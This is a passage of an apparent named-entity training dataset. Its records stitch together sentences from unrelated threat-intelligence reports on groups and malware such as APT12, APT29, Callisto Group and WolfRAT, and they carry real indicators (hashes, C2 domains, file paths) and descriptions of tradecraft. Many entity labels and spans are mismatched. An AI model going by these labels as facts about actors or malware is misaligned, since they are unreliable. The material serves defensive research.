TEMP.Veles has used port - protocol mismatches on ports such as 443 , 4444 , 8531 , and 50501 during C2 .", "spans": [{"start": 140, "end": 145, "label": "System"}, {"start": 162, "end": 171, "label": "Organization"}, {"start": 172, "end": 176, "label": "System"}, {"start": 193, "end": 225, "label": "Indicator"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 259, "end": 269, "label": "Malware"}, {"start": 274, "end": 352, "label": "Indicator"}, {"start": 360, "end": 362, "label": "System"}]} {"text": "WhatsApp message capture The service com.serenegiant.service.ScreenRecorderService , is invoked by the ScreenRecorderActivity . Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing . It is worth noting that this email appeared to have been sent from another Taiwanese Government employee , implying that the email was sent from a valid but compromised account . Some TrickBot samples have used HTTP over ports 447 and 8082 for C2 .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 37, "end": 82, "label": "Indicator"}, {"start": 412, "end": 417, "label": "System"}, {"start": 458, "end": 478, "label": "Organization"}, {"start": 508, "end": 513, "label": "System"}, {"start": 567, "end": 575, "label": "Malware"}, {"start": 594, "end": 613, "label": "Indicator"}, {"start": 618, "end": 622, "label": "Indicator"}, {"start": 627, "end": 629, "label": "System"}]} {"text": "Upon creation , this activity launches a thread that will loop on a 50-second interval . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform . HIGHTIDE : 6e59861931fa2796ee107dc27bfdd480 . 
Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443 .", "spans": [{"start": 179, "end": 200, "label": "Malware"}, {"start": 249, "end": 254, "label": "System"}, {"start": 314, "end": 322, "label": "Malware"}, {"start": 325, "end": 357, "label": "Indicator"}, {"start": 378, "end": 386, "label": "Malware"}, {"start": 480, "end": 488, "label": "Indicator"}]} {"text": "In the first iteration , the screen recording is started and will only stop when the RAT determines that WhatsApp is not running . These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing . The HIGHTIDE backdoor connected directly to 141.108.2.157 . [ 42 ] TYPEFRAME has used ports 443 , 8080 , and 8443 with a FakeTLS method .", "spans": [{"start": 105, "end": 113, "label": "System"}, {"start": 352, "end": 369, "label": "Malware"}, {"start": 392, "end": 405, "label": "Indicator"}, {"start": 415, "end": 424, "label": "Malware"}, {"start": 434, "end": 443, "label": "Indicator"}, {"start": 446, "end": 450, "label": "Indicator"}, {"start": 457, "end": 461, "label": "Indicator"}]} {"text": "It 's restarted in the next cycle independently based on if WhatsApp is running . Callisto Group appears to be intelligence gathering related to European foreign and security policy . If you compare the HTTP GET request from the RIPTIDE samples to the HTTP GET request from the HIGHTIDE samples you can see the malware author changed the following items : User Agent , Format and structure of the HTTP Uniform Resource Identifier ( URI ) . 
WellMail has been observed using TCP port 25 , without using SMTP , to leverage an open port for secure command and control communications .", "spans": [{"start": 60, "end": 68, "label": "System"}, {"start": 203, "end": 207, "label": "Indicator"}, {"start": 229, "end": 236, "label": "Malware"}, {"start": 252, "end": 256, "label": "Indicator"}, {"start": 278, "end": 286, "label": "Malware"}, {"start": 397, "end": 401, "label": "Indicator"}, {"start": 402, "end": 429, "label": "System"}, {"start": 432, "end": 435, "label": "System"}, {"start": 440, "end": 448, "label": "Malware"}, {"start": 473, "end": 484, "label": "Indicator"}]} {"text": "In this version , the developer added more classes from the same package . some indications of loosely linked activity dating back to at least 2013 . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . WIRTE has used HTTPS over ports 2083 and 2087 for C2.ZxShell can use ports 1985 and 1986 in HTTP / S communication.[47 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": [{"start": 161, "end": 168, "label": "Malware"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 215, "end": 223, "label": "Malware"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 242, "end": 246, "label": "System"}, {"start": 249, "end": 253, "label": "Indicator"}, {"start": 279, "end": 292, "label": "Vulnerability"}, {"start": 295, "end": 300, "label": "Malware"}, {"start": 310, "end": 315, "label": "System"}, {"start": 321, "end": 340, "label": "Indicator"}, {"start": 345, "end": 355, "label": "Malware"}, {"start": 364, "end": 413, "label": "Indicator"}]} {"text": "Even though we could not find indications of being in use , two stand out . 
In October 2015 , the Callisto Group was observed sending targeted credential phishing emails . FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases . Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment .", "spans": [{"start": 98, "end": 112, "label": "Organization"}, {"start": 172, "end": 179, "label": "Organization"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 240, "end": 246, "label": "System"}]} {"text": "Bluetooth \u2014 which allows the interaction with the Bluetooth interface , and net/deacon \u2014 which implements a beaconing system based on UDP . In early 2016 , the Callisto Group was observed sending targeted spear phishing emails . Based on past APT12 activity , we expect the threat group to continue to utilize phishing as a malware delivery method . 0824.1.doc : f6fafb7c30b1114befc93f39d0698560 , CVE-2012-0158 . Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used .", "spans": [{"start": 243, "end": 248, "label": "Organization"}, {"start": 350, "end": 360, "label": "Indicator"}, {"start": 363, "end": 395, "label": "Indicator"}, {"start": 398, "end": 411, "label": "Vulnerability"}]} {"text": "Android shell A new package was added that allows the execution of commands in the Android shell . The malicious attachments purported to be invitations or drafts of the agenda for the conference . Jason_invitation.doc : 00a95fb30be2d6271c491545f6c6a707 , CVE-2012-0158 . 
Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 83, "end": 90, "label": "System"}, {"start": 103, "end": 124, "label": "Malware"}, {"start": 141, "end": 152, "label": "System"}, {"start": 156, "end": 176, "label": "System"}, {"start": 198, "end": 218, "label": "Indicator"}, {"start": 221, "end": 253, "label": "Indicator"}, {"start": 256, "end": 269, "label": "Vulnerability"}]} {"text": "Again , this package source code is publicly available and can be found here . Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform . When the file is opened , it drops HIGHTIDE in the form of an executable file onto the infected system . Additional Email Delegate Permissions APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with ApplicationImpersonation rights to start collecting emails from targeted mailboxe .", "spans": [{"start": 104, "end": 118, "label": "Organization"}, {"start": 265, "end": 275, "label": "System"}, {"start": 374, "end": 382, "label": "Malware"}, {"start": 482, "end": 487, "label": "Organization"}]} {"text": "One of the uses the malware gives to this package is the execution of the command \" dumpsys '' to determine if certain activities are running . In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform . RIPTIDE and HIGHTIDE differ on several points : executable file location , image base address , the User-Agent within the GET requests , and the format of the URI . 
During the SolarWinds Compromise , APT29 added their own devices as allowed IDs for active sync using Set - CASMailbox , allowing it to obtain copies of victim mailboxes .", "spans": [{"start": 187, "end": 201, "label": "Organization"}, {"start": 224, "end": 229, "label": "System"}, {"start": 258, "end": 265, "label": "Organization"}, {"start": 277, "end": 284, "label": "Malware"}, {"start": 289, "end": 297, "label": "Malware"}, {"start": 436, "end": 439, "label": "System"}, {"start": 453, "end": 474, "label": "Organization"}, {"start": 477, "end": 482, "label": "Organization"}]} {"text": "Check if chat apps are running In the above example , the malware is searching for Line , Facebook Messenger and WhatsApp activities . We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets . The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder . Device Registration APT29 has enrolled a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account .", "spans": [{"start": 90, "end": 108, "label": "System"}, {"start": 113, "end": 121, "label": "System"}, {"start": 291, "end": 298, "label": "Malware"}, {"start": 427, "end": 435, "label": "Malware"}, {"start": 551, "end": 576, "label": "Organization"}]} {"text": "This is part of a class called CaptureService , which already existed in the previous version but it was not duly implemented . 
If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform . All but one sample that we identified were written to this folder as word.exe . During the SolarWinds Compromise , APT29 registered devices in order to enable mailbox syncing via the Set - CASMailbox command . .006", "spans": [{"start": 365, "end": 370, "label": "System"}, {"start": 487, "end": 495, "label": "Indicator"}, {"start": 509, "end": 530, "label": "Organization"}, {"start": 533, "end": 538, "label": "Organization"}]} {"text": "Previous version The capture service class implements the chat applications interception . Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China . The one outlier was written as winword.exe . Acquire Infrastructure : Web Services APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware , such as HAMMERTOSS .", "spans": [{"start": 221, "end": 232, "label": "Indicator"}, {"start": 260, "end": 278, "label": "Organization"}, {"start": 354, "end": 356, "label": "System"}, {"start": 360, "end": 367, "label": "Malware"}, {"start": 378, "end": 388, "label": "Malware"}]} {"text": "Upon creation the class will start to take screenshots that will be stopped and uploaded to the C2 once the service ca n't find the targeted applications running . they have been last known to employ malware in February 2016 . Research into this HIGHTIDE campaign revealed APT12 targeted multiple Taiwanese Government organizations between August 22 and 28 . 
APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations .", "spans": [{"start": 246, "end": 254, "label": "Malware"}, {"start": 273, "end": 278, "label": "Organization"}, {"start": 297, "end": 317, "label": "Organization"}, {"start": 359, "end": 364, "label": "Organization"}]} {"text": "The core of this functionality is also based on an open-source project that can be found here . RCS Galileo platform . On Monday August 25, 2014 we observed a different spear phish email sent from lilywang823@gmail.com to a technology company located in Taiwan . Cloud Administration Command APT29 has used Azure Run Command and Azure Admin - on - Behalf - of ( AOBO ) to execute code on virtual machines .", "spans": [{"start": 181, "end": 186, "label": "System"}, {"start": 197, "end": 218, "label": "Indicator"}, {"start": 263, "end": 297, "label": "Organization"}, {"start": 307, "end": 324, "label": "System"}, {"start": 329, "end": 368, "label": "System"}]} {"text": "Another novelty is a VPN-related package , which is based on OrbotVPN . The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment . This spear phish contained a malicious Word document that exploited CVE-2012-0158 . Cloud API APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments .", "spans": [{"start": 61, "end": 69, "label": "System"}, {"start": 131, "end": 145, "label": "Organization"}, {"start": 301, "end": 305, "label": "System"}, {"start": 330, "end": 343, "label": "Vulnerability"}, {"start": 346, "end": 361, "label": "Organization"}, {"start": 380, "end": 399, "label": "System"}, {"start": 434, "end": 461, "label": "System"}]} {"text": "Once again , it does n't seem to actually be in use . 
In October 2015 the Callisto Group targeted a handful of individuals with phishing emails that attempted to obtain the target 's webmail credentials . The MD5 of the exploit document was e009b95ff7b69cbbebc538b2c5728b11 . They have also utilized AADInternals PowerShell Modules to access the API .003 Compromise Accounts : Cloud Accounts APT29 has used residential proxies , including Azure Virtual Machines , to obfuscate their access to victim environments .", "spans": [{"start": 241, "end": 273, "label": "Indicator"}, {"start": 377, "end": 397, "label": "Organization"}, {"start": 407, "end": 426, "label": "System"}, {"start": 439, "end": 461, "label": "System"}]} {"text": "The same happens with the package squareup.otto , which is an open-source bus implementation focused on Android implementation . The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week . Similar to the newly discovered HIGHTIDE samples documented above , this malicious document dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe . Enterprise T1482 Domain Trust Discovery During the SolarWinds Compromise , APT29 used the Get - AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell .", "spans": [{"start": 34, "end": 47, "label": "Indicator"}, {"start": 104, "end": 111, "label": "System"}, {"start": 318, "end": 326, "label": "Malware"}, {"start": 439, "end": 461, "label": "Indicator"}, {"start": 511, "end": 536, "label": "Organization"}, {"start": 539, "end": 544, "label": "Organization"}]} {"text": "Both sources can be found here and here . Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks . THREEBYTE : 16e627dbe730488b1c3d448bfc9096e2 . 
They also used AdFind to enumerate domains and to discover trust between federated domains .", "spans": [{"start": 197, "end": 206, "label": "Malware"}, {"start": 209, "end": 241, "label": "Indicator"}, {"start": 259, "end": 265, "label": "System"}]} {"text": "Version # 4 : April 2020 \u2014 Domain : nampriknum.net Following the same pattern , this version has some added features and others , which were not in use , removed . On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf . This backdoor sent the following callback traffic to video.csmcpr.com . Dynamic Resolution During the SolarWinds Compromise , APT29 used dynamic DNS resolution to construct and resolve to randomly - generated subdomains for C2.[12 ]", "spans": [{"start": 36, "end": 50, "label": "Indicator"}, {"start": 177, "end": 191, "label": "Organization"}, {"start": 258, "end": 264, "label": "System"}, {"start": 267, "end": 270, "label": "System"}, {"start": 280, "end": 287, "label": "System"}, {"start": 413, "end": 429, "label": "Indicator"}, {"start": 462, "end": 483, "label": "Organization"}, {"start": 486, "end": 491, "label": "Organization"}]} {"text": "First of all the new package name is com.google.services , which can easily be confused with a legitimate Google service . \" With our latest research we now see how Greenbug has shifted away from HTTP-based C2 communication with Ismdoor . 
The THREEBYTE spear phishing incident ( while not yet attributed ) shared the following characteristics with the above HIGHTIDE campaign attributed to APT12 : The THREEBYTE backdoor was compiled two days after the HIGHTIDE backdoors ; Encrypted Channel APT29 has used multiple layers of encryption within malware to protect C2 communication .", "spans": [{"start": 37, "end": 56, "label": "Indicator"}, {"start": 106, "end": 112, "label": "Organization"}, {"start": 229, "end": 236, "label": "System"}, {"start": 243, "end": 252, "label": "Malware"}, {"start": 358, "end": 366, "label": "Malware"}, {"start": 390, "end": 395, "label": "Organization"}, {"start": 402, "end": 420, "label": "Malware"}, {"start": 453, "end": 471, "label": "Malware"}, {"start": 492, "end": 497, "label": "Organization"}]} {"text": "The VPN package is no longer present , further reinforcing our conclusion that it was not in use . It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . Both the THREEBYTE and HIGHTIDE backdoors were used in attacks targeting organizations in Taiwan ; Hybrid Identity APT29 has edited the Microsoft.IdentityServer.Servicehost.exe.config file to load a malicious DLL into the AD FS process , thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name .", "spans": [{"start": 125, "end": 151, "label": "System"}, {"start": 282, "end": 301, "label": "Organization"}, {"start": 347, "end": 356, "label": "Malware"}, {"start": 361, "end": 379, "label": "Malware"}, {"start": 437, "end": 458, "label": "Organization"}]} {"text": "WolfRAT application screen The Google GMS and Firebase service has been added , however , no configuration has been found , even though services seem to be referenced in the of a new class . 
t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . Both the THREEBYTE and HIGHTIDE backdoors were written to the same filepath of C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe ; Spearphishing Attachment APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.002 Phishing : Spearphishing Link APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.003 Phishing : Spearphishing via Service APT29 has used the legitimate mailing service Constant Contact to send phishing e - mails .003", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 31, "end": 41, "label": "System"}, {"start": 46, "end": 54, "label": "System"}, {"start": 216, "end": 242, "label": "System"}, {"start": 373, "end": 392, "label": "Organization"}, {"start": 438, "end": 447, "label": "Malware"}, {"start": 452, "end": 470, "label": "Malware"}, {"start": 547, "end": 569, "label": "Indicator"}, {"start": 572, "end": 602, "label": "Organization"}, {"start": 717, "end": 741, "label": "Organization"}, {"start": 874, "end": 905, "label": "Organization"}]} {"text": "The new class is called NotificationListener and extends the NotificationListenerService class . By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection . APT12 has previously used the THREEBYTE backdoor . 
Proxy : Multi - hop Proxy A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 ( RDP ) , 139 ( Netbios ) , and 445 ( SMB ) enabling full remote access from outside the network and has also used TOR .004", "spans": [{"start": 232, "end": 237, "label": "Organization"}, {"start": 262, "end": 280, "label": "Malware"}, {"start": 291, "end": 319, "label": "Malware"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 537, "end": 540, "label": "System"}]} {"text": "This would allow the RAT to receive system notifications . In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials . On August 25, 2014, we observed another round of spear phishing emails targeting a high-technology company in Japan . Proxy : Domain Fronting APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.007 Remote Services : Cloud Services APT29 has leveraged compromised high - privileged on - premises accounts synced to Office 365 to move laterally into a cloud environment , including through the use of Azure AD PowerShell .", "spans": [{"start": 81, "end": 92, "label": "System"}, {"start": 241, "end": 247, "label": "System"}, {"start": 303, "end": 324, "label": "Organization"}, {"start": 416, "end": 431, "label": "System"}, {"start": 434, "end": 454, "label": "Organization"}, {"start": 617, "end": 636, "label": "System"}]} {"text": "Notification handling method The class is only implemented in debug mode , pushing all captured information into the log . To do this , it employs a number of specific commands via DNSMessenger . Attached to this email was another malicious document that was designed to exploit CVE-2012-0158 . 
Scheduled Task / Job : Scheduled Task APT29 has used named and hijacked scheduled tasks to establish persistence .", "spans": [{"start": 139, "end": 176, "label": "Malware"}, {"start": 181, "end": 193, "label": "System"}, {"start": 213, "end": 218, "label": "System"}, {"start": 279, "end": 292, "label": "Vulnerability"}, {"start": 318, "end": 338, "label": "Organization"}]} {"text": "The usage of the PlusShare API in 2020 denotes some unprofessional development , since this is the API to access Google+ . Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies . This malicious Word document had an MD5 of 499bec15ac83f2c8998f03917b63652e and dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe . During the SolarWinds Compromise , APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement .", "spans": [{"start": 17, "end": 26, "label": "System"}, {"start": 113, "end": 120, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 224, "end": 248, "label": "Organization"}, {"start": 294, "end": 326, "label": "Indicator"}, {"start": 392, "end": 414, "label": "Indicator"}, {"start": 428, "end": 449, "label": "Organization"}, {"start": 452, "end": 457, "label": "Organization"}]} {"text": "This service , along with the API , was fully decommissioned in March 2019 . By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent . The backdoor had the following properties : They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration .", "spans": []} {"text": "This version adds one significant class \u2014 it requests DEVICE_ADMIN privileges . 
Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim . WATERSPOUT : APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted .", "spans": [{"start": 86, "end": 95, "label": "System"}, {"start": 107, "end": 110, "label": "System"}, {"start": 308, "end": 318, "label": "Malware"}, {"start": 321, "end": 326, "label": "Organization"}]} {"text": "Device admin policies Looking at the policy 's definition , we can see that it lists all the available policies even if most of them are deprecated on Android 10.0 and their usage results in a security exception . According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website . f9cfda6062a8ac9e332186a7ec0e706a . Enterprise T1649 Steal or Forge Authentication Certificates APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates .", "spans": [{"start": 151, "end": 163, "label": "System"}, {"start": 485, "end": 518, "label": "Organization"}, {"start": 521, "end": 524, "label": "Organization"}, {"start": 537, "end": 569, "label": "Indicator"}, {"start": 589, "end": 637, "label": "Organization"}]} {"text": "The code implementation again seems that it has been added for testing purposes only . Trochilus RAT activity was discovered during both months of October and November 2015 . The backdoor connects to a command and control server at icc.ignorelist.com . 
Enterprise T1082 System Information Discovery During the SolarWinds Compromise , APT29 used fsutil to check available free space before executing actions that might create large files on disk .", "spans": [{"start": 232, "end": 250, "label": "Indicator"}, {"start": 306, "end": 331, "label": "Organization"}, {"start": 334, "end": 339, "label": "Organization"}]} {"text": "Versions overview The DenDroid code base was kept to such an extent that even the original base64-encoded password was kept . From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization . Similar to RIPTIDE and HIGHTIDE , the WATERSPOUT backdoor is an HTTP based backdoor that communicates with its C2 server . Enterprise T1199 Trusted Relationship APT29 has compromised IT , cloud services , and managed services providers to gain broad access to multiple customers for subsequent operations .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 210, "end": 223, "label": "System"}, {"start": 245, "end": 248, "label": "System"}, {"start": 261, "end": 269, "label": "System"}, {"start": 320, "end": 340, "label": "Organization"}, {"start": 354, "end": 361, "label": "Malware"}, {"start": 366, "end": 374, "label": "Malware"}, {"start": 381, "end": 400, "label": "Malware"}, {"start": 407, "end": 411, "label": "Indicator"}, {"start": 454, "end": 456, "label": "System"}, {"start": 483, "end": 509, "label": "Organization"}, {"start": 526, "end": 528, "label": "System"}, {"start": 531, "end": 545, "label": "System"}, {"start": 552, "end": 578, "label": "System"}]} {"text": "Original password The main service follows the same structure as the first version , the anti-analysis features are primitive , only checking the emulator environment without any kind of packing or obfuscation . 
We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples . Although there are no current infrastructure ties to link this backdoor to APT12 , there are several data points that show a possible tie to the same actors : During the SolarWinds Compromise , APT29 gained access through compromised accounts at cloud solution partners , and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems .", "spans": [{"start": 232, "end": 240, "label": "System"}, {"start": 428, "end": 433, "label": "Organization"}, {"start": 519, "end": 544, "label": "Organization"}, {"start": 547, "end": 552, "label": "Organization"}]} {"text": "The malware will start the main service if all the requested permissions and the device admin privileges are granted . The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past . Same initial delivery method ( spear phishing email ) with a Microsoft Word Document exploiting CVE-2012-0158 . User Execution : Malicious Link APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link .002 User Execution : Malicious File APT29 has used various forms of spearphishing attempting to get a user to open attachments , including , but not limited to , malicious Microsoft Word documents , .pdf , and .lnk files .", "spans": [{"start": 149, "end": 173, "label": "System"}, {"start": 294, "end": 299, "label": "System"}, {"start": 309, "end": 318, "label": "Organization"}, {"start": 319, "end": 323, "label": "System"}, {"start": 344, "end": 357, "label": "Vulnerability"}, {"start": 377, "end": 397, "label": "Organization"}, {"start": 513, "end": 533, "label": "Organization"}]} {"text": "Otherwise , it will launch an ACTION_APPLICATION_SETTINGS intent trying to trick the user to grant the permissions . 
Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time . The same \u201c Tran Duy Linh \u201d Microsoft Word Exploit Kit was used in delivery of this backdoor . Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": [{"start": 126, "end": 135, "label": "System"}, {"start": 140, "end": 153, "label": "System"}, {"start": 267, "end": 280, "label": "System"}, {"start": 283, "end": 292, "label": "Organization"}, {"start": 293, "end": 297, "label": "System"}, {"start": 373, "end": 387, "label": "Organization"}, {"start": 432, "end": 466, "label": "System"}]} {"text": "Each sample contains a userId hardcoded , meaning that each sample can only be used in a victim . The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone . Similar Targets were observed where the threat actors utilized this backdoor : Japanese Tech Company , Taiwanese Government Organizations , Organizations in the Asia-Pacific Region that are of Interest to China . During the SolarWinds Compromise , APT29 used different compromised credentials for remote access and to move laterally .", "spans": [{"start": 127, "end": 154, "label": "System"}, {"start": 374, "end": 395, "label": "Organization"}, {"start": 398, "end": 418, "label": "Organization"}, {"start": 515, "end": 540, "label": "Organization"}, {"start": 543, "end": 548, "label": "Organization"}]} {"text": "It seems , however , if the same victim has more than one device the malware can be reused since the IMEI is sent along with each data exfiltration . Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website . 
The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors : C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe , C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\winword.exe . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": [{"start": 188, "end": 204, "label": "System"}, {"start": 289, "end": 307, "label": "System"}, {"start": 314, "end": 333, "label": "Malware"}, {"start": 375, "end": 393, "label": "Malware"}, {"start": 435, "end": 457, "label": "Indicator"}, {"start": 499, "end": 524, "label": "Indicator"}, {"start": 570, "end": 578, "label": "Organization"}, {"start": 594, "end": 605, "label": "Organization"}, {"start": 622, "end": 632, "label": "Organization"}]} {"text": "It is clear that this RAT is under intense development , however , the addition and removal of packages , along with the huge quantity of unused code and usage of deprecated and old techniques denotes an amateur development methodology . The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables . WATERSPOUT was compiled within two days of the last HIGHTIDE backdoor and on the same day as the THREEBYTE backdoor . 
Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": [{"start": 343, "end": 359, "label": "System"}, {"start": 363, "end": 372, "label": "System"}, {"start": 409, "end": 413, "label": "System"}, {"start": 443, "end": 453, "label": "Malware"}, {"start": 495, "end": 512, "label": "Malware"}, {"start": 540, "end": 558, "label": "Malware"}, {"start": 571, "end": 578, "label": "Organization"}, {"start": 627, "end": 641, "label": "System"}, {"start": 653, "end": 666, "label": "Organization"}]} {"text": "CONCLUSION We witness actors continually using open-source platforms , code and packages to create their own software . We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University . APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": [{"start": 306, "end": 311, "label": "Organization"}, {"start": 462, "end": 472, "label": "Organization"}, {"start": 620, "end": 633, "label": "System"}, {"start": 637, "end": 645, "label": "System"}]} {"text": "Some are carried out well , others , like WolfRAT , are designed with an overload of functionality in mind as opposed to factoring any sensible approach to the development aspect . Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity . APT12 has the ability to adapt quickly to public exposures with new tools , tactics , and procedures ( TTPs ) . 
Now , there is a potential new competitor in the \" fake updates \" landscape that looks strangely familiar .", "spans": [{"start": 42, "end": 49, "label": "Malware"}, {"start": 181, "end": 190, "label": "System"}, {"start": 213, "end": 227, "label": "Organization"}, {"start": 323, "end": 328, "label": "Organization"}, {"start": 486, "end": 498, "label": "Organization"}]} {"text": "After all , a working product is often more important than a stable product . The activity dates to at least 2013 and has ties to multiple reports by other researchers . Public disclosures may result in an immediate change in APT12 \u2019s tools . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": [{"start": 226, "end": 231, "label": "Organization"}, {"start": 251, "end": 259, "label": "Organization"}, {"start": 276, "end": 282, "label": "Organization"}]} {"text": "We watched WolfRAT evolve through various iterations which shows that the actor wanted to ensure functional improvements \u2014 perhaps they had deadlines to meet for their customers , but with no thought given to removing old code blocks , classes , etc . It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook . These changes may be temporary and FireEye believes they are aimed at decreasing detection of their tools until a more permanent and effective TTP change can be implemented ( e.g. , WATERSPOUT ) . 
The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 272, "end": 280, "label": "System"}, {"start": 490, "end": 497, "label": "Organization"}, {"start": 637, "end": 647, "label": "Malware"}, {"start": 656, "end": 669, "label": "Organization"}, {"start": 687, "end": 701, "label": "System"}]} {"text": "throughout the Android package . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists . Although these points do not definitively tie WATERSPOUT to APT12 , they do indicate a possible connection between the WATERSPOUT campaign , the THREEBYTE campaign , and the HIGHTIDE campaign attributed to APT12 . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": [{"start": 15, "end": 22, "label": "System"}, {"start": 175, "end": 185, "label": "Malware"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 248, "end": 258, "label": "Malware"}, {"start": 274, "end": 283, "label": "Malware"}, {"start": 303, "end": 311, "label": "Malware"}, {"start": 335, "end": 340, "label": "Organization"}, {"start": 349, "end": 355, "label": "Organization"}, {"start": 356, 